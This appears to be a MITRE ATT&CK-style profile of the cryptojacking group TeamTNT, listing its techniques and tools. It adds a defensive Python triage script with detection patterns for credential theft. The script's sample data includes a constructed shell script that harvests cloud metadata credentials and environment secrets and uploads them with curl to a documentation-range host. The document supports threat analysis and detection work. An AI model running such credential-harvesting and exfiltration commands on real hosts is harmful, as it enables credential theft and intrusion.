
G0139 TeamTNT

TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[8][9][5][2][3][4][1][7][6]

Item Value
ID G0139
Associated Names
Version 1.2
Created 01 October 2021
Last Modified 19 October 2022

Techniques Used

Domain ID Name Use
enterprise T1098 Account Manipulation -
enterprise T1098.004 SSH Authorized Keys TeamTNT has added RSA keys in authorized_keys.[7][10]
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains TeamTNT has obtained domains to host their payloads.[8]
enterprise T1595 Active Scanning -
enterprise T1595.001 Scanning IP Blocks TeamTNT has scanned specific lists of target IP addresses.[4]
enterprise T1595.002 Vulnerability Scanning TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.[4]
enterprise T1071 Application Layer Protocol TeamTNT has used an IRC bot for C2 communications.[4]
enterprise T1071.001 Web Protocols TeamTNT has used the curl command to send credentials over HTTP and the curl and wget commands to download new software.[5][2][10] TeamTNT has also used a custom user agent HTTP header in shell scripts.[4]
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder TeamTNT has added batch scripts to the startup folder.[1]
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell TeamTNT has executed PowerShell commands in batch scripts.[1]
enterprise T1059.003 Windows Command Shell TeamTNT has used batch scripts to download tools and execute cryptocurrency miners.[1]
enterprise T1059.004 Unix Shell TeamTNT has used shell scripts for execution.[4][10]
enterprise T1059.009 Cloud API TeamTNT has leveraged the AWS CLI to enumerate cloud environments with compromised credentials.[11]
enterprise T1609 Container Administration Command TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers.[3]
enterprise T1613 Container and Resource Discovery TeamTNT has checked for running containers with docker ps and for specific container names with docker inspect.[4] TeamTNT has also searched for Kubernetes pods running in a local network.[10]
enterprise T1136 Create Account -
enterprise T1136.001 Local Account TeamTNT has created local privileged users on victim machines.[5]
enterprise T1543 Create or Modify System Process -
enterprise T1543.002 Systemd Service TeamTNT has established persistence through the creation of a cryptocurrency mining system service using systemctl.[4][10]
enterprise T1543.003 Windows Service TeamTNT has used malware that adds cryptocurrency miners as a service.[1]
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging TeamTNT has aggregated collected credentials in text files before exfiltrating.[10]
enterprise T1140 Deobfuscate/Decode Files or Information TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.[10]
enterprise T1610 Deploy Container TeamTNT has deployed different types of containers into victim environments to facilitate execution.[5][4] TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.[10]
enterprise T1587 Develop Capabilities -
enterprise T1587.001 Malware TeamTNT has developed custom malware such as Hildegard.[3]
enterprise T1611 Escape to Host TeamTNT has deployed privileged containers that mount the filesystem of the victim machine.[5][7]
enterprise T1048 Exfiltration Over Alternative Protocol TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL.[10]
enterprise T1133 External Remote Services TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments.[5][10] TeamTNT has also targeted exposed kubelets for Kubernetes environments.[3]
enterprise T1083 File and Directory Discovery TeamTNT has used a script that checks /proc/*/environ for environment variables related to AWS.[10]
enterprise T1222 File and Directory Permissions Modification -
enterprise T1222.002 Linux and Mac File and Directory Permissions Modification TeamTNT has modified the permissions on binaries with chattr.[4][10]
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure.[1][10]
enterprise T1562.004 Disable or Modify System Firewall TeamTNT has disabled iptables.[7]
enterprise T1070 Indicator Removal -
enterprise T1070.002 Clear Linux or Mac System Logs TeamTNT has removed system logs from /var/log/syslog.[7]
enterprise T1070.003 Clear Command History TeamTNT has cleared command history with history -c.[4][10]
enterprise T1070.004 File Deletion TeamTNT has used a payload that removes itself after running. TeamTNT has also deleted locally staged files containing collected credentials or scan results for local IP addresses after exfiltrating them.[1][10]
enterprise T1105 Ingress Tool Transfer TeamTNT has used the curl and wget commands as well as batch scripts to download new tools.[5][10]
enterprise T1036 Masquerading TeamTNT has disguised their scripts with docker-related file names.[10]
enterprise T1036.005 Match Legitimate Name or Location TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.[10]
enterprise T1046 Network Service Discovery TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters.[2][3][10] TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.[8]
enterprise T1027 Obfuscated Files or Information TeamTNT has encrypted its binaries via AES and encoded files using Base64.[4][7]
enterprise T1027.002 Software Packing TeamTNT has used UPX and the Ezuri packer to pack its binaries.[4]
enterprise T1120 Peripheral Device Discovery TeamTNT has searched for attached VGA devices using lspci.[10]
enterprise T1057 Process Discovery TeamTNT has searched for rival malware and removed it if found.[4] TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.[10]
enterprise T1219 Remote Access Software TeamTNT has established tmate sessions for C2 communications.[3][10]
enterprise T1021 Remote Services -
enterprise T1021.004 SSH TeamTNT has used SSH to connect back to victim machines.[5] TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.[10]
enterprise T1496 Resource Hijacking TeamTNT has deployed XMRig Docker images to mine cryptocurrency.[9][2] TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.[10]
enterprise T1014 Rootkit TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.[4][10]
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery TeamTNT has searched for security products on infected machines.[1][10]
enterprise T1608 Stage Capabilities -
enterprise T1608.001 Upload Malware TeamTNT has uploaded backdoored Docker images to Docker Hub.[9]
enterprise T1082 System Information Discovery TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information.[1][10]
enterprise T1016 System Network Configuration Discovery TeamTNT has enumerated the host machine's IP address.[4]
enterprise T1049 System Network Connections Discovery TeamTNT has run netstat -anp to search for rival malware connections.[4] TeamTNT has also used libprocesshider to modify /etc/ld.so.preload.[1]
enterprise T1007 System Service Discovery TeamTNT has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them.[10]
enterprise T1569 System Services TeamTNT has created system services to execute cryptocurrency mining software.[10]
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files TeamTNT has searched for unsecured AWS credentials and Docker API credentials.[2][4][10]
enterprise T1552.004 Private Keys TeamTNT has searched for unsecured SSH keys.[2][4]
enterprise T1552.005 Cloud Instance Metadata API TeamTNT has queried the AWS instance metadata service for credentials.[4][10]
enterprise T1204 User Execution -
enterprise T1204.003 Malicious Image TeamTNT has relied on users to download and execute malicious Docker images.[9]
enterprise T1102 Web Service TeamTNT has leveraged iplogger.org to send collected data back to C2.[7][10]
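Several rows above describe host artifacts a responder can look for directly: a libprocesshider entry in /etc/ld.so.preload (T1049 row), /.dockerenv replaced with a script (T1036.005), added authorized_keys entries (T1098.004), a mining systemd service (T1543.002), and dropped shell scripts that read /proc/*/environ, query the instance metadata service, post credentials with curl and run history -c (T1083, T1552.005, T1071.001, T1070.003). The triage script below is an added example written for this page; it is not MITRE's code and not TeamTNT tooling. It works on an in-memory snapshot so it runs offline; the sample snapshot, the 203.0.113.10 address (RFC 5737 documentation range) and the "staging directory" heuristic for ExecStart are constructed assumptions, and the known_keys allowlist is something you supply from your own inventory.

```python
"""Host-triage heuristics for the TeamTNT tradecraft listed in the table above.

Added example (not from the ATT&CK page or any TeamTNT report). Operates on a
{path: contents} snapshot; collect_snapshot() builds one from a real root.
"""
import os
import re
from typing import Dict, Iterable, List

# Files named in the techniques table. The heuristics applied to them are this
# example's own assumptions, e.g. "any ld.so.preload entry deserves a look".
WATCHED_PATHS = ["/etc/ld.so.preload", "/.dockerenv", "/root/.ssh/authorized_keys"]

# Assumption: a unit whose ExecStart lives in a temp dir or a dot-directory is worth flagging.
SUSPICIOUS_EXEC_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Script indicators drawn from the table rows (IMDS query, /proc/*/environ read,
# history -c, chattr +i, curl uploading a file or form data).
SCRIPT_INDICATORS = {
    "imds_query": re.compile(r"169\.254\.169\.254/latest/meta-data"),
    "proc_environ_read": re.compile(r"/proc/\S*environ"),
    "history_clear": re.compile(r"\bhistory\s+-c\b"),
    "chattr_immutable": re.compile(r"\bchattr\s+\+i\b"),
    "curl_post_creds": re.compile(r"curl\b[^\n]*(-d|--data|-F|-T)\b"),
}


def check_ld_preload(contents: str) -> List[str]:
    # libprocesshider hides processes by being listed here; on most servers the file is absent or empty.
    libs = [l.strip() for l in contents.splitlines() if l.strip() and not l.lstrip().startswith("#")]
    return [f"ld.so.preload loads {lib}" for lib in libs]


def check_dockerenv(contents: str) -> List[str]:
    # /.dockerenv is normally a zero-byte marker inside containers; a script body there is masquerading.
    if contents.lstrip().startswith("#!"):
        return ["/.dockerenv contains an executable script instead of an empty marker"]
    return []


def check_authorized_keys(contents: str, known_keys: Iterable[str]) -> List[str]:
    known = set(known_keys)
    findings = []
    for line in contents.splitlines():
        fields = line.split()
        if len(fields) < 2 or line.lstrip().startswith("#"):
            continue
        # A key line is "[options] type blob [comment]"; the blob follows the key type.
        for i, field in enumerate(fields[:-1]):
            if field.startswith(("ssh-", "ecdsa-", "sk-")):
                blob = fields[i + 1]
                if blob not in known:
                    findings.append(f"unknown {field} key in authorized_keys: {blob[:16]}...")
                break
    return findings


def check_systemd_unit(path: str, contents: str) -> List[str]:
    findings = []
    for line in contents.splitlines():
        if line.startswith("ExecStart="):
            cmd = line.split("=", 1)[1].strip().lstrip("-@")
            binary = cmd.split()[0] if cmd.split() else ""
            if binary.startswith(SUSPICIOUS_EXEC_DIRS) or "/." in binary:
                findings.append(f"{os.path.basename(path)}: ExecStart runs {binary} from a staging or hidden directory")
    return findings


def check_script(path: str, contents: str) -> List[str]:
    return [f"{path}: {name}" for name, rx in SCRIPT_INDICATORS.items() if rx.search(contents)]


def triage(snapshot: Dict[str, str], known_keys: Iterable[str] = ()) -> List[str]:
    findings: List[str] = []
    for path, contents in snapshot.items():
        if path == "/etc/ld.so.preload":
            findings += check_ld_preload(contents)
        elif path == "/.dockerenv":
            findings += check_dockerenv(contents)
        elif path.endswith("/authorized_keys"):
            findings += check_authorized_keys(contents, known_keys)
        elif path.endswith(".service"):
            findings += check_systemd_unit(path, contents)
        if contents.lstrip().startswith("#!"):  # any shell script in the snapshot gets the indicator scan
            findings += check_script(path, contents)
    return findings


def collect_snapshot(root: str = "/") -> Dict[str, str]:
    """Read the watched files and systemd units from a real filesystem (root="/" on a live host)."""
    candidates = list(WATCHED_PATHS)
    unit_dir = os.path.join(root, "etc/systemd/system")
    if os.path.isdir(unit_dir):
        candidates += ["/etc/systemd/system/" + n for n in os.listdir(unit_dir) if n.endswith(".service")]
    snap = {}
    for p in candidates:
        try:
            with open(os.path.join(root, p.lstrip("/")), errors="replace") as fh:
                snap[p] = fh.read()
        except OSError:
            pass
    return snap


# Constructed sample snapshot (not real TeamTNT artifacts) exercising every check.
SAMPLE_SNAPSHOT = {
    "/etc/ld.so.preload": "/usr/local/lib/libprocesshider.so\n",
    "/.dockerenv": (
        "#!/bin/bash\n"
        "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/.creds\n"
        "cat /proc/*/environ | grep -a AWS >> /tmp/.creds\n"
        "curl -F file=@/tmp/.creds http://203.0.113.10/upload\n"
        "history -c\n"
    ),
    "/root/.ssh/authorized_keys": (
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC-ADMIN-KEY admin@bastion\n"
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC-UNKNOWN-KEY\n"
    ),
    "/etc/systemd/system/miner.service": "[Service]\nExecStart=/tmp/.x/xmrig --config /tmp/.x/config.json\n",
}
KNOWN_KEYS = {"AAAAB3NzaC1yc2EAAAADAQABAAABAQC-ADMIN-KEY"}

if __name__ == "__main__":
    for finding in triage(SAMPLE_SNAPSHOT, KNOWN_KEYS):
        print(finding)
```

On a live host, run triage(collect_snapshot("/"), known_keys) as root; the ld.so.preload and /.dockerenv checks are the cheapest high-signal ones, while the ExecStart heuristic will also flag legitimate units that start binaries from temporary directories and needs a local allowlist.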

Software

ID Name References Techniques
S0601 Hildegard [3] Application Layer Protocol, Unix Shell:Command and Scripting Interpreter, Container Administration Command, Container and Resource Discovery, Local Account:Create Account, Systemd Service:Create or Modify System Process, Deobfuscate/Decode Files or Information, Escape to Host, Exploitation for Privilege Escalation, External Remote Services, Dynamic Linker Hijacking:Hijack Execution Flow, Disable or Modify Tools:Impair Defenses, File Deletion:Indicator Removal, Clear Command History:Indicator Removal, Ingress Tool Transfer, Masquerade Task or Service:Masquerading, Network Service Discovery, Obfuscated Files or Information, Software Packing:Obfuscated Files or Information, Remote Access Software, Resource Hijacking, Rootkit, System Information Discovery, Private Keys:Unsecured Credentials, Cloud Instance Metadata API:Unsecured Credentials, Credentials In Files:Unsecured Credentials, Web Service
S0349 LaZagne [1] Keychain:Credentials from Password Stores, Credentials from Password Stores, Windows Credential Manager:Credentials from Password Stores, Credentials from Web Browsers:Credentials from Password Stores, /etc/passwd and /etc/shadow:OS Credential Dumping, LSA Secrets:OS Credential Dumping, LSASS Memory:OS Credential Dumping, Proc Filesystem:OS Credential Dumping, Cached Domain Credentials:OS Credential Dumping, Credentials In Files:Unsecured Credentials
S0179 MimiPenguin [8] Proc Filesystem:OS Credential Dumping
S0683 Peirates [12] Cloud Storage Object Discovery, Container Administration Command, Container and Resource Discovery, Data from Cloud Storage, Deploy Container, Escape to Host, Network Service Discovery, Steal Application Access Token, Cloud Instance Metadata API:Unsecured Credentials, Container API:Unsecured Credentials, Application Access Token:Use Alternate Authentication Material, Cloud Accounts:Valid Accounts

References


  1. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. 

  2. Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. 

  3. Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. 

  4. Fiser, D., Oliveira, A. (n.d.). Tracking the Activities of TeamTNT: A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. 

  5. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. 

  6. Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. 

  7. Kol, R., Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. 

  8. Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. 

  9. Stroud, J. (2021, May 25). Taking TeamTNT’s Docker Images Offline. Retrieved September 22, 2021. 

  10. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022. 

  11. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved July 8, 2022. 

  12. Nathaniel Quist. (2021, June 4). TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Retrieved February 8, 2022.